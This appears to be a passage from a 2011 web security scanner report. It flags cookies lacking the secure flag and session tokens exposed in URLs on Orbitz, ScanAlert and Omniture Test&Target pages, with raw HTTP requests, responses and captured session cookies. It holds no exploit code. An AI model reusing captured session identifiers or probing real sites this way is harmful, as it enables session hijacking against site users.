Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...

7.43. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSetupCareAlertsProfile

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OSC=E880838379B672AED84437867BF4C6BA; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/ViewSetupCareAlertsProfile?z=2ed9&r=18&shadowing=false HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E880838379B672AED84437867BF4C6BA; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Location: https://www.orbitz.com/Secure/RequiredLogin?z=2ed9&r=18&shadowing=false&retrieveParams=true&z=3bd6&r=1
Content-Length: 0
Date: Wed, 02 Feb 2011 16:15:35 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

7.44. https://www.scanalert.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.scanalert.com
Path:	/RatingVerify

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

resin=1724539402.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RatingVerify HTTP/1.1
Host: www.scanalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: McAfeeSecure
Location: https://www.mcafeesecure.com/RatingVerify
Content-Length: 0
Connection: close
Date: Thu, 03 Feb 2011 04:05:13 GMT
Set-Cookie: resin=1724539402.20480.0000; path=/

8. Session token in URL previous next
There are 29 instances of this issue:

https://admin.testandtarget.omniture.com/
https://admin.testandtarget.omniture.com/login_hal.css
https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js
https://admin.testandtarget.omniture.com/skins/omniture/images/adobe-lq.png
https://admin.testandtarget.omniture.com/skins/omniture/images/footer_gradient.gif
https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_green_dash.gif
https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_head_bg.png
https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_headerbar.gif
https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_left_panel.jpg
https://admin.testandtarget.omniture.com/skins/omniture/login.css
https://admin.testandtarget.omniture.com/skins/omniture/static_header.css
https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html
http://api.demandbase.com/api/v1/ip.json
https://gc.synxis.com/xbe/rez.aspx
http://l.sharethis.com/pview
http://local.msn.com/
http://local.msn.com/hourly.aspx
http://local.msn.com/movies-events.aspx
http://local.msn.com/news.aspx
http://local.msn.com/restaurants.aspx
http://local.msn.com/sports.aspx
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard
https://my.omniture.com/p/suite/1.2/index.html
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard
http://track.roiservice.com/track/LogToDb.asp.aspx
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. https://admin.testandtarget.omniture.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

https://admin.testandtarget.omniture.com/login_hal.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9
https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9?version=unknown_version
https://admin.testandtarget.omniture.com/skins/omniture/login.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9
https://admin.testandtarget.omniture.com/skins/omniture/static_header.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET / HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 19:00:36 GMT
Server: Test & Target
Content-Length: 22164

<html>
<head>
<title>ADOBE - Test&Target Login</title>
<link rel="stylesheet" type="text/css" href="/skins/omniture/static_header.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9">
<link rel="stylesheet" type="text/css" href="/skins/omniture/login.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9">

<style type="text/css">
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="/login_hal.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9">

<script type="text/javascript" src="https://sc.omniture.com/p/ap/1.1/js/mbox.js"></script>

<script type="text/javascript" src="/scripts/jquery/jquery.js;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9?version=unknown_version"></script>
...[SNIP]...

8.2. https://admin.testandtarget.omniture.com/login_hal.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/login_hal.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/login_hal.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /login_hal.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Length: 695
Date: Wed, 02 Feb 2011 19:00:36 GMT
Server: Test & Target

.domains_login_container {
width: 95%;
height: 80%;
overflow: auto;
}

.domain_login_block {
background-image: url(user/login/resources/lgn_green_dash.gif);
background-position: bottom;
ba
...[SNIP]...

8.3. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/scripts/jquery/jquery.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9?version=unknown_version

Request

GET /scripts/jquery/jquery.js;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9?version=unknown_version HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Content-Type: text/html
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 19:00:36 GMT
Server: Test & Target
Content-Length: 72174

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

8.4. https://admin.testandtarget.omniture.com/skins/omniture/images/adobe-lq.png previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/adobe-lq.png

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/adobe-lq.png;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/adobe-lq.png;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"871-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/png
Content-Length: 871
Date: Wed, 02 Feb 2011 19:00:39 GMT
Server: Test & Target

.PNG
.
...IHDR...+...H.....o=.4....sBIT....|.d.... pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.6/23/09k.SZ....IDATh....n.0...}.k...]
e6.p..e).....A....%...k..A...8
...[SNIP]...

8.5. https://admin.testandtarget.omniture.com/skins/omniture/images/footer_gradient.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/footer_gradient.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/footer_gradient.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/footer_gradient.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"873-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/gif
Content-Length: 873
Date: Wed, 02 Feb 2011 19:00:39 GMT
Server: Test & Target

GIF89a..................................................................................................................................................................................................
...[SNIP]...

8.6. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_green_dash.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/lgn_green_dash.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_green_dash.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/lgn_green_dash.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"54-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/gif
Content-Length: 54
Date: Wed, 02 Feb 2011 19:00:40 GMT
Server: Test & Target

GIF89a.......x./.........!.......,............$...R..;

8.7. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_head_bg.png previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/lgn_head_bg.png

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_head_bg.png;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/lgn_head_bg.png;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"17399-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/png
Content-Length: 17399
Date: Wed, 02 Feb 2011 19:00:39 GMT
Server: Test & Target

.PNG
.
...IHDR.......Z.....(..
....sRGB.........bKGD............. pHYs.................tIME...
..
e..X.. .IDATx...].\.}...s.e.B..i..]....X...q.us...5.B.;1.t.d.").A`..=..zO.bK"..X.Di..%.26.L......a..
...[SNIP]...

8.8. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_headerbar.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/omtr_lgn_headerbar.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_headerbar.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/omtr_lgn_headerbar.gif;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"149-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/gif
Content-Length: 149
Date: Wed, 02 Feb 2011 19:00:39 GMT
Server: Test & Target

GIF89a.......................................................................................................!.......,...........`..Ld... .p<O.8P...;

8.9. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_left_panel.jpg previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/images/omtr_lgn_left_panel.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_left_panel.jpg;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/images/omtr_lgn_left_panel.jpg;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
